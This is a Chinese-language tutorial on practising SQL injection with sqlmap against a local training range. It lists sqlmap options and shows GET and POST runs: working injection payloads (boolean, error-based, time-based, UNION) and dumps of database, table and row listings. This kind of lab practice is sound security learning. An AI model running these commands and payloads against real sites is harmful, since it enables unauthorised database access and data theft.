web安全之通过sqlmap工具进行靶场练习

news2024/11/25 23:35:48

基础语法

get类型的注入

post类型的注入

基础语法

-u:用于get提交方式，后面跟注入的url网址

--dbs：获取所有数据库
--tables：获取所有数据表
--columns：获取所有字段
--dump：打印数据

-D：查询选择某个库
-T：查询选择某个表
-C：查询选择某个字段

level：执行测试的等级（1~5，默认为1），使用-level参数并且数值>=2的时候会检查cookie里面的参数，当>=3时检查user-agent和refereer

risk：执行测试的风险（0~3,默认为1），默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加or语句的sql注入

--level 修改level
--risk 修改risk

-r表示加载一个文件，-p指定参数，*指定标记选择
--current -db 当前数据库
--forms 自动检测表单

get类型的注入

sqlmap.py -u "http://localhost:8079/Less-2/?id=1"

sqlmap.py -u "http://localhost:8079/Less-4/?id=1" --level 3

判断数据库类型

testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n

测试等级和风险等级

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

发现可能存在的注入点

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

结果：一共扫描到四种注入漏洞

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8073=8073

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1 AND EXTRACTVALUE(1627,CONCAT(0x5c,0x71767a6271,(SELECT (ELT(1627=1627,1))),0x7170787071))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8628 FROM (SELECT(SLEEP(5)))GfAy)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6956 UNION ALL SELECT NULL,CONCAT(0x71767a6271,0x4e4b4778734d67466d55544b674f545247684a4c514c53776e5254444661534862787668486d6b4e,0x7170787071),NULL-- -
---
[11:28:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2.4.39
back-end DBMS: MySQL >= 5.1

sqlmap.py -u "http://localhost:8079/Less-4/?id=1" --dbs

available databases [8]:
[*] challenges
[*] information_schema
[*] my_data
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] sys

sqlmap.py -u "http://localhost:8079/Less-4/?id=1" -D "my_data" --tables

Database: my_data
[2 tables]
+------+
| dept |
| emp |
+------+

sqlmap.py -u "http://localhost:8079/Less-4/?id=1" -D "my_data" -T "dept" --columns

Database: my_data
Table: dept
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| deptno | varchar(20) |
| name | varchar(20) |
+--------+-------------+

sqlmap.py -u "http://localhost:8079/Less-4/?id=1" -D "my_data" -T "dept" -C"deptno,name" --dump

Database: my_data
Table: dept
[4 entries]
+--------+--------+
| deptno | name |
+--------+--------+
| 1001 | 研发部 |
| 1002 | 销售部 |
| 1003 | 财务部 |
| 1004 | 人事部 |
+--------+--------+

sqlmap.py -u "http://localhost:8079/Less-4/?id=1" -D "my_data" -T "dept"  --dump

Database: my_data
Table: dept
[4 entries]
+--------+--------+
| name | deptno |
+--------+--------+
| 研发部 | 1001 |
| 销售部 | 1002 |
| 财务部 | 1003 |
| 人事部 | 1004 |
+--------+--------+

获取的数据记录到文本文件...下表...转储到 CSV 文件

查看文件获得详细信息

post类型的注入

sqlmap.py -r C:\Users\admin\Desktop\post.txt -p uname --dbs

Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1212") OR NOT 6219=6219#&passwd=121&submit=Submit

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uname=1212") AND GTID_SUBSET(CONCAT(0x716b707871,(SELECT (ELT(2053=2053,1))),0x717a7a6a71),2053) AND ("qlYR"="qlYR&passwd=121&submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1212") AND (SELECT 8841 FROM (SELECT(SLEEP(5)))LUlr) AND ("ZbZp"="ZbZp&passwd=121&submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1212") UNION ALL SELECT CONCAT(0x716b707871,0x4d796c4576656d57444b52756f5441745144615968736d4256727969584578486f72454b4f727068,0x717a7a6a71),NULL#&passwd=121&submit=Submit
---
[12:09:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.3.29
back-end DBMS: MySQL >= 5.6
[12:09:34] [INFO] fetching database names
available databases [8]:
[*] challenges
[*] information_schema
[*] my_data
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] sys

sqlmap.py -r C:\Users\admin\Desktop\post.txt -p uname -D my_data --tables

Database: my_data
[2 tables]
+------+
| dept |
| emp |
+------+

在post.txt文件内手动标记注入点（不推荐）

uname=1212*&passwd=121&submit=Submit

sqlmap.py -r C:\Users\admin\Desktop\post.txt --dbs

POST parameter '#1*' is vulnerable

#1：第一个标记*号的位置

sqlmap.py -r C:\Users\admin\Desktop\post.txt --current-db

current database: 'security'

sqlmap.py -u "http://localhost:8079/Less-12/" --forms --dbs

web application technology: Apache 2.4.39, PHP 5.3.29
back-end DBMS: MySQL >= 5.6
[12:29:21] [INFO] fetching database names
available databases [8]:
[*] challenges
[*] information_schema
[*] my_data
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] sys